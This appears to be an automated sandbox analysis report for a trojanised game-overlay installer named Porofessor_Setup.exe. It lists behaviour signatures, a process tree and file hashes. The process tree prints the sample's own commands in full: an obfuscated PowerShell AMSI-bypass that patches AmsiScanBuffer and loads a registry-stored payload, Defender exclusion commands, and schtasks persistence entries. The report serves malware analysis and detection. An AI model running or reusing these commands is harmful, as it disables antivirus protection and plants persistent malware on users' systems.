Analysis

  • max time kernel
    150s
  • max time network
    159s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    02/12/2024, 16:10

General

  • Target

    tmpfile-main/Porofessor_Setup.exe

  • Size

    2.5MB

  • MD5

    8a19e78bbcb60ea27e0294b197401aa5

  • SHA1

    049cd6a13a45c99d2a902fb98f90a6c229946482

  • SHA256

    30a808ece805c7265f7db8bb5a43fbeb3bfdc1b0a460e2b6739261453cea62b4

  • SHA512

    0b011e2eba7dfebbf26c380323b6de550cedf38d9f01f1aae1e15ef895013ba909afc1bbcad4464370b1ec0ebd607aeb5acc96e0d015dc67de43ba68435045ba

  • SSDEEP

    49152:QvYTdtKEj/ol/08eXoRIs2PjufadJk+Zl11k56gOz02Y6N1gWb:AY5t7k5/0orrfad9j1kwTo2xA

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 11 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 36 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 36 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:876
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{0b9d97cd-70d0-4750-963d-4863934568ef}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:620
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:676
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:956
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:324
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:408
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:476
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:1028
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                    PID:1108
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1180
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2800
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:KioPFOPJLoXW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zvAMVMTMpGFjoQ,[Parameter(Position=1)][Type]$iZzKMyfdqE)$qjYVfFLBouE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'fle'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](80)+'u'+'b'+'lic'+[Char](44)+'Se'+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+'An'+'s'+''+[Char](105)+'C'+[Char](108)+'ass'+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+'C'+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$qjYVfFLBouE.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+'e'+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+'u'+''+'b'+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$zvAMVMTMpGFjoQ).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$qjYVfFLBouE.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+'lot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+'u'+''+'a'+''+[Char](108)+'',$iZzKMyfdqE,$zvAMVMTMpGFjoQ).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $qjYVfFLBouE.CreateType();}$crbEeMsYAWAHN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+'of'+[Char](116)+''+[Char](46)+'Wi'+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+'ve'+[Char](77)+''+'e'+'th'+'o'+''+[Char](100)+''+[Char](115)+'');$bElbYgYIuskLxB=$crbEeMsYAWAHN.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+'Addre'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+'tati'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iUnxxmedEtTGkCBaLbG=KioPFOPJLoXW @([String])([IntPtr]);$jOsynmMZfBQvcleROMzgZj=KioPFOPJLoXW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uwWrwpeyFqH=$crbEeMsYAWAHN.GetMethod(''+'G'+''+'e'+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+''+[Char](72)+''+[Char](97)+'n'+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l3'+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$VZQqyTBYdtDZOK=$bElbYgYIuskLxB.Invoke($Null,@([Object]$uwWrwpeyFqH,[Object]('L'+[Char](111)+''+[Char](97)+'dLib'+[Char](114)+''+[Char](97)+'ry'+'A'+'')));$lNDeybodhYSdonzDf=$bElbYgYIuskLxB.Invoke($Null,@([Object]$uwWrwpeyFqH,[Object]('V'+'i'+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$tiBbssI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VZQqyTBYdtDZOK,$iUnxxmedEtTGkCBaLbG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$bWPYbujdWzPUnlTpG=$bElbYgYIuskLxB.Invoke($Null,@([Object]$tiBbssI,[Object]('Am'+'s'+''+'i'+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$uOCXWOgTtl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lNDeybodhYSdonzDf,$jOsynmMZfBQvcleROMzgZj).Invoke($bWPYbujdWzPUnlTpG,[uint32]8,4,[ref]$uOCXWOgTtl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bWPYbujdWzPUnlTpG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lNDeybodhYSdonzDf,$jOsynmMZfBQvcleROMzgZj).Invoke($bWPYbujdWzPUnlTpG,[uint32]8,0x20,[ref]$uOCXWOgTtl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+'T'+'W'+[Char](65)+'RE').GetValue(''+[Char](36)+''+[Char](78)+''+[Char](111)+'d'+[Char](101)+''+[Char](115)+'ta'+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:908
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1228
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                        1⤵
                          PID:1252
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                          1⤵
                            PID:1260
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1312
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1456
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2552
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                  1⤵
                                    PID:1508
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1532
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                      1⤵
                                        PID:1548
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1592
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1672
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1732
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1860
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:1880
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1900
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1908
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1920
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1984
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2076
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2260
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2280
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                1⤵
                                                                  PID:2528
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2560
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2568
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2624
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2768
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2816
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2840
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2868
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2884
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:2980
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3080
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3556
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                        PID:3644
                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe"
                                                                                          2⤵
                                                                                          • Checks computer location settings
                                                                                          • Adds Run key to start application
                                                                                          • Drops file in Program Files directory
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3564
                                                                                          • C:\Program Files\WinRAR\Temp\Updater.exe
                                                                                            "C:\Program Files\WinRAR\Temp\Updater.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2412
                                                                                            • C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe" Sel=1&Partner=3776&Extension=pibhbkkgefgheeglaeemkkfjlhidhcedalapdggh&Name=Porofessor.gg&UtmSource=porofessor-website&UtmMedium=download-button&UtmCampaign=download-button&Referer=porofessor.gg&Browser=chrome -partnerCustomizationLevel 0 --app-name="Porofessor" -exepath C:\Program Files\WinRAR\Temp\Updater.exe
                                                                                              4⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3720
                                                                                              • C:\Windows\System32\DxDiag.exe
                                                                                                "C:\Windows\System32\DxDiag.exe" /tC:\Users\Admin\AppData\Local\Overwolf\Temp\DxDiagOutput.txt
                                                                                                5⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:1300
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Node64.exe'
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1240
                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /Create /F /TN "Node64" /SC ONLOGON /TR "C:\Program Files\Node64.exe" /RL HIGHEST
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1528
                                                                                          • C:\Program Files\Node64.exe
                                                                                            "C:\Program Files\Node64.exe"
                                                                                            3⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Drops file in System32 directory
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2164
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
                                                                                              4⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4888
                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                              "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
                                                                                              4⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:2176
                                                                                            • C:\Windows\System32\$Node32.exe
                                                                                              "C:\Windows\System32\$Node32.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1716
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
                                                                                              4⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2180
                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                              "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
                                                                                              4⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:524
                                                                                            • C:\Windows\System32\$Node2Json.exe
                                                                                              "C:\Windows\System32\$Node2Json.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2004
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
                                                                                              4⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:1740
                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                              "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
                                                                                              4⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:240
                                                                                            • C:\Windows\System32\$Node3Json.exe
                                                                                              "C:\Windows\System32\$Node3Json.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3140
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3748
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:4080
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4104
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:4336
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4624
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:2916
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:4572
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:1584
                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4872
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:3988
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                          PID:4720
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:8
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                            1⤵
                                                                                                              PID:4728
                                                                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                              1⤵
                                                                                                                PID:3536
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                1⤵
                                                                                                                  PID:4712
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:4420
                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    1⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:1568
                                                                                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                    1⤵
                                                                                                                      PID:3216
                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                      C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                      1⤵
                                                                                                                        PID:4464
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                        1⤵
                                                                                                                          PID:3404
                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          PID:4628
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                                                                          1⤵
                                                                                                                            PID:4076

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Program Files\Node64.exe

                                                                                                                            Filesize

                                                                                                                            368KB

                                                                                                                            MD5

                                                                                                                            47fe2649cc2325a477fce08731aeb716

                                                                                                                            SHA1

                                                                                                                            268abf2cceac62263fe040dc40b8b4b9aa3592da

                                                                                                                            SHA256

                                                                                                                            d3808b41fe847339d9d69eaa05a5c7dea072b3e6325127a53b54c0d5e102f49b

                                                                                                                            SHA512

                                                                                                                            173bd39f32dc4c95309e8e23a33542f92bb1c22459be30e47b52ab92827f418c7ba59fd9b31606f7f40824366e949e7de89a851d1acb8425bbf7fd607632e0d4

                                                                                                                          • C:\Program Files\WinRAR\Temp\Updater.exe

                                                                                                                            Filesize

                                                                                                                            2.4MB

                                                                                                                            MD5

                                                                                                                            5f6bcb8ac6f38320eaa317a982c0a795

                                                                                                                            SHA1

                                                                                                                            116361e38b82776e2298d486faf11470c8d536c7

                                                                                                                            SHA256

                                                                                                                            7e67ad2b6f7ed0e1d2720f038169b2c625f16b15e15f78e549268b4b6794fd85

                                                                                                                            SHA512

                                                                                                                            b170d677dad9b9434450d55930070a7887f8e35cf397899ffa9aeb68e7b98c18ed7bf261dacbd9800ee4db98dc5ae8924253d12210b0bf404ea29bedbe28e195

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                            Filesize

                                                                                                                            3KB

                                                                                                                            MD5

                                                                                                                            3eb3833f769dd890afc295b977eab4b4

                                                                                                                            SHA1

